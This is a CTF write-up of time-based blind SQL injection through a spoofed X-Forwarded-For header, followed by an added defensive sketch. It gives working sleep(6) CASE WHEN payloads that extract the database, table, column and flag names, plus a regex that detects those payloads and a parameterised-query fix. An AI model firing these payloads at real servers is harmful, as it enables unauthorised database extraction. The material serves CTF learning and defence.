实验吧 - "who are you" writeup (time-based blind injection)

Opening the link shows the following content:

Analysis: my first thought was that this is a challenge about spoofing the client IP, so the next step is to use an HTTP header that carries a forwarded address (for example X-Forwarded-For). The spoof succeeds in Burp, as shown below:

Response:

So the spoof works, but the SQL statements appear to have been turned into plain strings (the header value is being pasted into the query text), so the response gives nothing to compare against. What next?

Time-based blind injection?!

Using a `select case when(...) then ... end` statement and judging by the difference in response time, we can work out the length of the database name, the table names, the column names and so on. The injection statements are as follows:

```python
# i: character position (or length guess), j: candidate character.
# The surrounding loop (not shown on the page) iterates over i and j
# and times each response; a ~6 s delay marks a true condition.

# length of database
# header = {"X-Forwarded-For": "'+(select case when(select(length(database()))>%s) then 0 else sleep(6) end) and 'a'='a" % i}
# name of database
# header = {"X-Forwarded-For": "'+(select case when (substring((select database()) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
# length of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
# name of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';')"
#                              " from information_schema.tables where table_schema='web4') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
# length of column
# header = {
#     "X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';') "
#                        "from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='') "
#                        "then sleep(6) else 0 end) and 'a'='a" % i}
# name of column
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';')"
#                              " from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
# length of flag
# header = {
#     "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
#                        "from flag) from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
# name of flag
header = {
    "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
                       "from flag) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
```

The result:
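The root cause here is that the application copies the X-Forwarded-For header straight into an SQL string, and the `sleep(6)` inside `case when` is what turns that into a timing oracle. As an added example (not from the original writeup), the following Python shows the defender's side of the same bug: a check that flags header values shaped like these time-based payloads, and a parameterised insert that stores the header as data so the payload never becomes SQL. The table name `visitors`, the sample header values and the use of sqlite3 are assumptions made for the demo.

```python
import ipaddress
import re
import sqlite3

# Constructed sample X-Forwarded-For values (not real traffic): two benign,
# two shaped like the writeup's time-based payloads (sleep() in CASE WHEN).
SAMPLE_XFF = [
    "203.0.113.7",
    "'+(select case when(select(length(database()))>5) then 0 else sleep(6) end) and 'a'='a",
    "10.0.0.1, 198.51.100.9",
    "' or (select case when(1=1) then sleep(6) else 0 end) and 'a'='a",
]

# A legitimate X-Forwarded-For is a comma-separated list of IP literals.
# Anything else is suspicious; sleep()/benchmark() are called out explicitly
# so a time-based probe is visible in triage rather than buried as "malformed".
TIME_MARKERS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)

def is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False

def classify_xff(value):
    parts = [p.strip() for p in value.split(",")]
    if parts and all(is_ip(p) for p in parts):
        return "ok"
    if TIME_MARKERS.search(value):
        return "time-based-sqli"
    return "malformed"

# Mitigation: bind the header as a parameter. The same payload that sleeps
# in the writeup is stored verbatim as a string and never parsed as SQL.
def log_visitor(conn, xff):
    conn.execute("INSERT INTO visitors(ip) VALUES (?)", (xff,))
    conn.commit()

def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visitors(ip TEXT)")
    verdicts = {v: classify_xff(v) for v in SAMPLE_XFF}
    for v in SAMPLE_XFF:
        log_visitor(conn, v)
    stored = conn.execute("SELECT COUNT(*) FROM visitors").fetchone()[0]
    return verdicts, stored
```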
